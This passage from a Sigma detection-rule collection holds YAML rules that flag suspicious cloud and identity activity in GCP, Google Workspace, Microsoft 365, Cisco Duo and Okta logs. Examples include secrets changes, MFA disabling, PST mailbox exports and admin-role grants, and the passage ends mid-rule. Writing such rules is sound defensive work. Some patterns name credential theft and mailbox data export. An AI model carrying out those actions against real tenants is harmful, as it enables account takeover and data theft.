title: Google Cloud Kubernetes RoleBinding
id: 0322d9f2-289a-47c2-b5e1-b63c90901a3e
status: test
description: Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.
references:
- https://github.com/elastic/detection-rules/pull/1267
- https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole
- https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control
- https://kubernetes.io/docs/reference/access-authn-authz/rbac/
- https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging
author: Austin Songer @austinsonger
date: 2021-08-09
modified: 2022-10-09
tags:
- attack.credential-access
logsource:
product: gcp
service: gcp.audit
detection:
selection:
gcp.audit.method_name:
- io.k8s.authorization.rbac.v*.clusterrolebindings.create
- io.k8s.authorization.rbac.v*.rolebindings.create
- io.k8s.authorization.rbac.v*.clusterrolebindings.patch
- io.k8s.authorization.rbac.v*.rolebindings.patch
- io.k8s.authorization.rbac.v*.clusterrolebindings.update
- io.k8s.authorization.rbac.v*.rolebindings.update
- io.k8s.authorization.rbac.v*.clusterrolebindings.delete
- io.k8s.authorization.rbac.v*.rolebindings.delete
condition: selection
falsepositives:
- RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/gcp/audit/gcp_kubernetes_secrets_modified_or_deleted.yml
================================================
title: Google Cloud Kubernetes Secrets Modified or Deleted
id: 2f0bae2d-bf20-4465-be86-1311addebaa3
status: test
description: Identifies when the Secrets are Modified or Deleted.
references:
- https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging
author: Austin Songer @austinsonger
date: 2021-08-09
modified: 2022-10-09
tags:
- attack.credential-access
logsource:
product: gcp
service: gcp.audit
detection:
selection:
gcp.audit.method_name:
- io.k8s.core.v*.secrets.create
- io.k8s.core.v*.secrets.update
- io.k8s.core.v*.secrets.patch
- io.k8s.core.v*.secrets.delete
condition: selection
falsepositives:
- Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/gcp/audit/gcp_service_account_disabled_or_deleted.yml
================================================
title: Google Cloud Service Account Disabled or Deleted
id: 13f81a90-a69c-4fab-8f07-b5bb55416a9f
status: test
description: Identifies when a service account is disabled or deleted in Google Cloud.
references:
- https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts
author: Austin Songer @austinsonger
date: 2021-08-14
modified: 2022-10-09
tags:
- attack.impact
- attack.t1531
logsource:
product: gcp
service: gcp.audit
detection:
selection:
gcp.audit.method_name|endswith:
- .serviceAccounts.disable
- .serviceAccounts.delete
condition: selection
falsepositives:
- Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/gcp/audit/gcp_service_account_modified.yml
================================================
title: Google Cloud Service Account Modified
id: 6b67c12e-5e40-47c6-b3b0-1e6b571184cc
status: test
description: Identifies when a service account is modified in Google Cloud.
references:
- https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts
author: Austin Songer @austinsonger
date: 2021-08-14
modified: 2022-10-09
tags:
- attack.impact
logsource:
product: gcp
service: gcp.audit
detection:
selection:
gcp.audit.method_name|endswith:
- .serviceAccounts.patch
- .serviceAccounts.create
- .serviceAccounts.update
- .serviceAccounts.enable
- .serviceAccounts.undelete
condition: selection
falsepositives:
- Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/gcp/audit/gcp_sql_database_modified_or_deleted.yml
================================================
title: Google Cloud SQL Database Modified or Deleted
id: f346bbd5-2c4e-4789-a221-72de7685090d
status: test
description: Detect when a Cloud SQL DB has been modified or deleted.
references:
- https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update
author: Austin Songer @austinsonger
date: 2021-10-15
modified: 2022-12-25
tags:
- attack.impact
logsource:
product: gcp
service: gcp.audit
detection:
selection:
gcp.audit.method_name:
- cloudsql.instances.create
- cloudsql.instances.delete
- cloudsql.users.update
- cloudsql.users.delete
condition: selection
falsepositives:
- SQL Database being modified or deleted may be performed by a system administrator.
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/gcp/audit/gcp_vpn_tunnel_modified_or_deleted.yml
================================================
title: Google Cloud VPN Tunnel Modified or Deleted
id: 99980a85-3a61-43d3-ac0f-b68d6b4797b1
status: test
description: Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.
references:
- https://any-api.com/googleapis_com/compute/docs/vpnTunnels
author: Austin Songer @austinsonger
date: 2021-08-16
modified: 2022-10-09
tags:
- attack.impact
logsource:
product: gcp
service: gcp.audit
detection:
selection:
gcp.audit.method_name:
- compute.vpnTunnels.insert
- compute.vpnTunnels.delete
condition: selection
falsepositives:
- VPN Tunnel being modified or deleted may be performed by a system administrator.
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/gcp/gworkspace/gcp_gworkspace_application_access_levels_modified.yml
================================================
title: Google Workspace Application Access Level Modified
id: 22f2fb54-5312-435d-852f-7c74f81684ca
status: test
description: |
Detects when an access level is changed for a Google workspace application.
An access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model.
An adversary would be able to remove access levels to gain easier access to Google workspace resources.
references:
- https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-application-settings
- https://support.google.com/a/answer/9261439
author: Bryan Lim
date: 2024-01-12
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1098.003
logsource:
product: gcp
service: google_workspace.admin
detection:
selection:
eventService: 'admin.googleapis.com'
eventName: 'CHANGE_APPLICATION_SETTING'
setting_name|startswith: 'ContextAwareAccess'
condition: selection
falsepositives:
- Legitimate administrative activities changing the access levels for an application
level: medium
================================================
FILE: rules/cloud/gcp/gworkspace/gcp_gworkspace_application_removed.yml
================================================
title: Google Workspace Application Removed
id: ee2803f0-71c8-4831-b48b-a1fc57601ee4
status: test
description: Detects when an an application is removed from Google Workspace.
references:
- https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3
- https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION
- https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST
author: Austin Songer
date: 2021-08-26
modified: 2023-10-11
tags:
- attack.impact
logsource:
product: gcp
service: google_workspace.admin
detection:
selection:
eventService: admin.googleapis.com
eventName:
- REMOVE_APPLICATION
- REMOVE_APPLICATION_FROM_WHITELIST
condition: selection
falsepositives:
- Application being removed may be performed by a System Administrator.
level: medium
================================================
FILE: rules/cloud/gcp/gworkspace/gcp_gworkspace_granted_domain_api_access.yml
================================================
title: Google Workspace Granted Domain API Access
id: 04e2a23a-9b29-4a5c-be3a-3542e3f982ba
status: test
description: Detects when an API access service account is granted domain authority.
references:
- https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3
- https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS
author: Austin Songer
date: 2021-08-23
modified: 2023-10-11
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1098
logsource:
product: gcp
service: google_workspace.admin
detection:
selection:
eventService: admin.googleapis.com
eventName: AUTHORIZE_API_CLIENT_ACCESS
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/gcp/gworkspace/gcp_gworkspace_mfa_disabled.yml
================================================
title: Google Workspace MFA Disabled
id: 780601d1-6376-4f2a-884e-b8d45599f78c
status: test
description: Detects when multi-factor authentication (MFA) is disabled.
references:
- https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3
- https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION
- https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION
author: Austin Songer
date: 2021-08-26
modified: 2023-10-11
tags:
- attack.impact
logsource:
product: gcp
service: google_workspace.admin
detection:
selection_base:
eventService: admin.googleapis.com
eventName:
- ENFORCE_STRONG_AUTHENTICATION
- ALLOW_STRONG_AUTHENTICATION
selection_eventValue:
new_value: 'false'
condition: all of selection*
falsepositives:
- MFA may be disabled and performed by a system administrator.
level: medium
================================================
FILE: rules/cloud/gcp/gworkspace/gcp_gworkspace_role_modified_or_deleted.yml
================================================
title: Google Workspace Role Modified or Deleted
id: 6aef64e3-60c6-4782-8db3-8448759c714e
status: test
description: Detects when an a role is modified or deleted in Google Workspace.
references:
- https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3
- https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings
author: Austin Songer
date: 2021-08-24
modified: 2023-10-11
tags:
- attack.impact
logsource:
product: gcp
service: google_workspace.admin
detection:
selection:
eventService: admin.googleapis.com
eventName:
- DELETE_ROLE
- RENAME_ROLE
- UPDATE_ROLE
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/gcp/gworkspace/gcp_gworkspace_role_privilege_deleted.yml
================================================
title: Google Workspace Role Privilege Deleted
id: bf638ef7-4d2d-44bb-a1dc-a238252e6267
status: test
description: Detects when an a role privilege is deleted in Google Workspace.
references:
- https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3
- https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings
author: Austin Songer
date: 2021-08-24
modified: 2023-10-11
tags:
- attack.impact
logsource:
product: gcp
service: google_workspace.admin
detection:
selection:
eventService: admin.googleapis.com
eventName: REMOVE_PRIVILEGE
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/gcp/gworkspace/gcp_gworkspace_user_granted_admin_privileges.yml
================================================
title: Google Workspace User Granted Admin Privileges
id: 2d1b83e4-17c6-4896-a37b-29140b40a788
status: test
description: Detects when an Google Workspace user is granted admin privileges.
references:
- https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3
- https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE
author: Austin Songer
date: 2021-08-23
modified: 2023-10-11
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1098
logsource:
product: gcp
service: google_workspace.admin
detection:
selection:
eventService: admin.googleapis.com
eventName:
- GRANT_DELEGATED_ADMIN_PRIVILEGES
- GRANT_ADMIN_PRIVILEGE
condition: selection
falsepositives:
- Google Workspace admin role privileges, may be modified by system administrators.
level: medium
================================================
FILE: rules/cloud/m365/audit/microsoft365_bypass_conditional_access.yml
================================================
title: Azure Login Bypassing Conditional Access Policies
id: 13f2d3f5-6497-44a7-bf5f-dc13ffafe5dc
status: experimental
description: |
Detects a successful login to the Microsoft Intune Company Portal which could allow bypassing Conditional Access Policies and InTune device trust using a tool like TokenSmith.
author: Josh Nickels, Marius Rothenbücher
references:
- https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/
- https://github.com/JumpsecLabs/TokenSmith
date: 2025-01-08
tags:
- attack.privilege-escalation
- attack.persistence
- attack.initial-access
- attack.defense-evasion
- attack.t1078
logsource:
service: audit
product: m365
detection:
selection:
Operation: 'UserLoggedIn'
ApplicationId: '9ba1a5c7-f17a-4de9-a1f1-6178c8d51223'
ResultStatus: 'Success'
RequestType: 'Cmsi:Cmsi'
filter_main_bjectid:
ObjectId: '0000000a-0000-0000-c000-000000000000' # Microsoft Intune seen when mobile devices are enrolled
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/cloud/m365/audit/microsoft365_disabling_mfa.yml
================================================
title: Disabling Multi Factor Authentication
id: 60de9b57-dc4d-48b9-a6a0-b39e0469f876
status: test
description: Detects disabling of Multi Factor Authentication.
references:
- https://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/
author: Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)
date: 2023-09-18
tags:
- attack.persistence
- attack.defense-evasion
- attack.credential-access
- attack.t1556.006
logsource:
service: audit
product: m365
detection:
selection:
Operation|contains: 'Disable Strong Authentication.'
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/cloud/m365/audit/microsoft365_new_federated_domain_added_audit.yml
================================================
title: New Federated Domain Added
id: 58f88172-a73d-442b-94c9-95eaed3cbb36
related:
- id: 42127bdd-9133-474f-a6f1-97b6c08a4339
type: similar
status: test
description: Detects the addition of a new Federated Domain.
references:
- https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/
- https://o365blog.com/post/aadbackdoor/
author: Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)
date: 2023-09-18
tags:
- attack.defense-evasion
- attack.privilege-escalation
- attack.t1484.002
logsource:
service: audit
product: m365
detection:
selection_domain:
Operation|contains: 'domain'
selection_operation:
Operation|contains:
- 'add'
- 'new'
condition: all of selection_*
falsepositives:
- The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider.
level: medium
================================================
FILE: rules/cloud/m365/exchange/microsoft365_new_federated_domain_added_exchange.yml
================================================
title: New Federated Domain Added - Exchange
id: 42127bdd-9133-474f-a6f1-97b6c08a4339
related:
- id: 58f88172-a73d-442b-94c9-95eaed3cbb36
type: similar
status: test
description: Detects the addition of a new Federated Domain.
references:
- https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf
- https://us-cert.cisa.gov/ncas/alerts/aa21-008a
- https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html
- https://www.sygnia.co/golden-saml-advisory
- https://o365blog.com/post/aadbackdoor/
author: Splunk Threat Research Team (original rule), '@ionsor (rule)'
date: 2022-02-08
tags:
- attack.persistence
- attack.t1136.003
logsource:
service: exchange
product: m365
detection:
selection:
eventSource: Exchange
eventName: 'Add-FederatedDomain'
status: success
condition: selection
falsepositives:
- The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider.
level: medium
================================================
FILE: rules/cloud/m365/threat_detection/microsoft365_from_susp_ip_addresses.yml
================================================
title: Activity from Suspicious IP Addresses
id: a3501e8e-af9e-43c6-8cd6-9360bdaae498
status: test
description: |
Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence.
These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.
references:
- https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy
- https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
author: Austin Songer @austinsonger
date: 2021-08-23
modified: 2022-10-09
tags:
- attack.command-and-control
- attack.t1573
logsource:
service: threat_detection
product: m365
detection:
selection:
eventSource: SecurityComplianceCenter
eventName: 'Activity from suspicious IP addresses'
status: success
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/m365/threat_management/microsoft365_activity_by_terminated_user.yml
================================================
title: Activity Performed by Terminated User
id: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee
status: test
description: |
Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce.
This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.
references:
- https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy
- https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
author: Austin Songer @austinsonger
date: 2021-08-23
modified: 2022-10-09
tags:
- attack.impact
logsource:
service: threat_management
product: m365
detection:
selection:
eventSource: SecurityComplianceCenter
eventName: 'Activity performed by terminated user'
status: success
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/m365/threat_management/microsoft365_activity_from_anonymous_ip_addresses.yml
================================================
title: Activity from Anonymous IP Addresses
id: d8b0a4fe-07a8-41be-bd39-b14afa025d95
status: test
description: Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.
references:
- https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy
- https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
author: Austin Songer @austinsonger
date: 2021-08-23
modified: 2022-10-09
tags:
- attack.command-and-control
- attack.t1573
logsource:
service: threat_management
product: m365
detection:
selection:
eventSource: SecurityComplianceCenter
eventName: 'Activity from anonymous IP addresses'
status: success
condition: selection
falsepositives:
- User using a VPN or Proxy
level: medium
================================================
FILE: rules/cloud/m365/threat_management/microsoft365_activity_from_infrequent_country.yml
================================================
title: Activity from Infrequent Country
id: 0f2468a2-5055-4212-a368-7321198ee706
status: test
description: Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.
references:
- https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy
- https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
author: Austin Songer @austinsonger
date: 2021-08-23
modified: 2022-10-09
tags:
- attack.command-and-control
- attack.t1573
logsource:
service: threat_management
product: m365
detection:
selection:
eventSource: SecurityComplianceCenter
eventName: 'Activity from infrequent country'
status: success
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/m365/threat_management/microsoft365_data_exfiltration_to_unsanctioned_app.yml
================================================
title: Data Exfiltration to Unsanctioned Apps
id: 2b669496-d215-47d8-bd9a-f4a45bf07cda
status: test
description: Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.
references:
- https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy
- https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
author: Austin Songer @austinsonger
date: 2021-08-23
modified: 2022-10-09
tags:
- attack.exfiltration
- attack.t1537
logsource:
service: threat_management
product: m365
detection:
selection:
eventSource: SecurityComplianceCenter
eventName: 'Data exfiltration to unsanctioned apps'
status: success
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/m365/threat_management/microsoft365_impossible_travel_activity.yml
================================================
title: Microsoft 365 - Impossible Travel Activity
id: d7eab125-5f94-43df-8710-795b80fa1189
status: test
description: Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.
references:
- https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy
- https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
author: Austin Songer @austinsonger
date: 2020-07-06
modified: 2021-11-27
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.t1078
logsource:
service: threat_management
product: m365
detection:
selection:
eventSource: SecurityComplianceCenter
eventName: 'Impossible travel activity'
status: success
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/m365/threat_management/microsoft365_logon_from_risky_ip_address.yml
================================================
title: Logon from a Risky IP Address
id: c191e2fa-f9d6-4ccf-82af-4f2aba08359f
status: test
description: Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.
references:
- https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy
- https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
author: Austin Songer @austinsonger
date: 2021-08-23
modified: 2022-10-09
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.t1078
logsource:
service: threat_management
product: m365
detection:
selection:
eventSource: SecurityComplianceCenter
eventName: 'Log on from a risky IP address'
status: success
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/m365/threat_management/microsoft365_potential_ransomware_activity.yml
================================================
title: Microsoft 365 - Potential Ransomware Activity
id: bd132164-884a-48f1-aa2d-c6d646b04c69
status: test
description: Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.
references:
- https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy
- https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
author: austinsonger
date: 2021-08-19
modified: 2022-10-09
tags:
- attack.impact
- attack.t1486
logsource:
service: threat_management
product: m365
detection:
selection:
eventSource: SecurityComplianceCenter
eventName: 'Potential ransomware activity'
status: success
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/m365/threat_management/microsoft365_pst_export_alert.yml
================================================
title: PST Export Alert Using eDiscovery Alert
id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0
related:
- id: 6897cd82-6664-11ed-9022-0242ac120002
type: similar
status: test
description: Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content
references:
- https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide
author: Sorina Ionescu
date: 2022-02-08
modified: 2022-11-17
tags:
- attack.collection
- attack.t1114
logsource:
service: threat_management
product: m365
definition: Requires the 'eDiscovery search or exported' alert to be enabled
detection:
selection:
eventSource: SecurityComplianceCenter
eventName: 'eDiscovery search started or exported'
status: success
condition: selection
falsepositives:
- PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored.
level: medium
================================================
FILE: rules/cloud/m365/threat_management/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml
================================================
title: PST Export Alert Using New-ComplianceSearchAction
id: 6897cd82-6664-11ed-9022-0242ac120002
related:
- id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0
type: similar
status: test
description: Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.
references:
- https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps
author: Nikita Khalimonenkov
date: 2022-11-17
tags:
- attack.collection
- attack.t1114
logsource:
service: threat_management
product: m365
detection:
selection:
eventSource: SecurityComplianceCenter
Payload|contains|all:
- 'New-ComplianceSearchAction'
- 'Export'
- 'pst'
condition: selection
falsepositives:
- Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored.
level: medium
================================================
FILE: rules/cloud/m365/threat_management/microsoft365_susp_inbox_forwarding.yml
================================================
title: Suspicious Inbox Forwarding
id: 6c220477-0b5b-4b25-bb90-66183b4089e8
status: test
description: Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.
references:
- https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy
- https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
author: Austin Songer @austinsonger
date: 2021-08-22
modified: 2022-10-09
tags:
- attack.exfiltration
- attack.t1020
logsource:
service: threat_management
product: m365
detection:
selection:
eventSource: SecurityComplianceCenter
eventName: 'Suspicious inbox forwarding'
status: success
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/cloud/m365/threat_management/microsoft365_susp_oauth_app_file_download_activities.yml
================================================
title: Suspicious OAuth App File Download Activities
id: ee111937-1fe7-40f0-962a-0eb44d57d174
status: test
description: Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.
references:
- https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy
- https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
author: Austin Songer @austinsonger
date: 2021-08-23
modified: 2022-10-09
tags:
- attack.exfiltration
logsource:
service: threat_management
product: m365
detection:
selection:
eventSource: SecurityComplianceCenter
eventName: 'Suspicious OAuth app file download activities'
status: success
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/m365/threat_management/microsoft365_unusual_volume_of_file_deletion.yml
================================================
title: Microsoft 365 - Unusual Volume of File Deletion
id: 78a34b67-3c39-4886-8fb4-61c46dc18ecd
status: test
description: Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.
references:
- https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy
- https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
author: austinsonger
date: 2021-08-19
modified: 2022-10-09
tags:
- attack.impact
- attack.t1485
logsource:
service: threat_management
product: m365
detection:
selection:
eventSource: SecurityComplianceCenter
eventName: 'Unusual volume of file deletion'
status: success
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/m365/threat_management/microsoft365_user_restricted_from_sending_email.yml
================================================
title: Microsoft 365 - User Restricted from Sending Email
id: ff246f56-7f24-402a-baca-b86540e3925c
status: test
description: Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.
references:
- https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy
- https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
author: austinsonger
date: 2021-08-19
modified: 2022-10-09
tags:
- attack.initial-access
- attack.t1199
logsource:
service: threat_management
product: m365
detection:
selection:
eventSource: SecurityComplianceCenter
eventName: 'User restricted from sending email'
status: success
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/identity/cisco_duo/cisco_duo_mfa_bypass_via_bypass_code.yml
================================================
title: Cisco Duo Successful MFA Authentication Via Bypass Code
id: 6f7e1c10-2dc9-4312-adb6-9574ff09a5c8
status: test
description: |
Detects when a successful MFA authentication occurs due to the use of a bypass code.
A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.
references:
- https://duo.com/docs/adminapi#logs
- https://help.duo.com/s/article/6327?language=en_US
author: Nikita Khalimonenkov
date: 2024-04-17
tags:
- attack.credential-access
- attack.defense-evasion
- attack.initial-access
logsource:
product: cisco
service: duo
detection:
selection:
event_type: authentication
reason: bypass_user
condition: selection
falsepositives:
- Legitimate user that was assigned on purpose to a bypass group
level: medium
================================================
FILE: rules/identity/okta/okta_admin_activity_from_proxy_query.yml
================================================
title: Okta Admin Functions Access Through Proxy
id: 9058ca8b-f397-4fd1-a9fa-2b7aad4d6309
status: test
description: Detects access to Okta admin functions through proxy.
references:
- https://www.beyondtrust.com/blog/entry/okta-support-unit-breach
- https://dataconomy.com/2023/10/23/okta-data-breach/
- https://blog.cloudflare.com/how-cloudflare-mitigated-yet-another-okta-compromise/
author: Muhammad Faisal @faisalusuf
date: 2023-10-25
tags:
- attack.credential-access
logsource:
service: okta
product: okta
detection:
selection:
debugContext.debugData.requestUri|contains: 'admin'
securityContext.isProxy: 'true'
condition: selection
falsepositives:
- False positives are expected if administrators access these function through proxy legitimatly. Apply additional filters if necessary
level: medium
================================================
FILE: rules/identity/okta/okta_admin_role_assigned_to_user_or_group.yml
================================================
title: Okta Admin Role Assigned to an User or Group
id: 413d4a81-6c98-4479-9863-014785fd579c
status: test
description: Detects when an the Administrator role is assigned to an user or group.
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://developer.okta.com/docs/reference/api/event-types/
author: Austin Songer @austinsonger
date: 2021-09-12
modified: 2022-10-09
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1098.003
logsource:
product: okta
service: okta
detection:
selection:
eventtype:
- group.privilege.grant
- user.account.privilege.grant
condition: selection
falsepositives:
- Administrator roles could be assigned to users or group by other admin users.
level: medium
================================================
FILE: rules/identity/okta/okta_admin_role_assignment_created.yml
================================================
title: Okta Admin Role Assignment Created
id: 139bdd4b-9cd7-49ba-a2f4-744d0a8f5d8c
status: test
description: Detects when a new admin role assignment is created. Which could be a sign of privilege escalation or persistence
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://developer.okta.com/docs/reference/api/event-types/
author: Nikita Khalimonenkov
date: 2023-01-19
tags:
- attack.persistence
logsource:
product: okta
service: okta
detection:
selection:
eventtype: 'iam.resourceset.bindings.add'
condition: selection
falsepositives:
- Legitimate creation of a new admin role assignment
level: medium
================================================
FILE: rules/identity/okta/okta_api_token_created.yml
================================================
title: Okta API Token Created
id: 19951c21-229d-4ccb-8774-b993c3ff3c5c
status: test
description: Detects when a API token is created
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://developer.okta.com/docs/reference/api/event-types/
author: Austin Songer @austinsonger
date: 2021-09-12
modified: 2022-10-09
tags:
- attack.persistence
logsource:
product: okta
service: okta
detection:
selection:
eventtype: system.api_token.create
condition: selection
falsepositives:
- Legitimate creation of an API token by authorized users
level: medium
================================================
FILE: rules/identity/okta/okta_api_token_revoked.yml
================================================
title: Okta API Token Revoked
id: cf1dbc6b-6205-41b4-9b88-a83980d2255b
status: test
description: Detects when a API Token is revoked.
references:
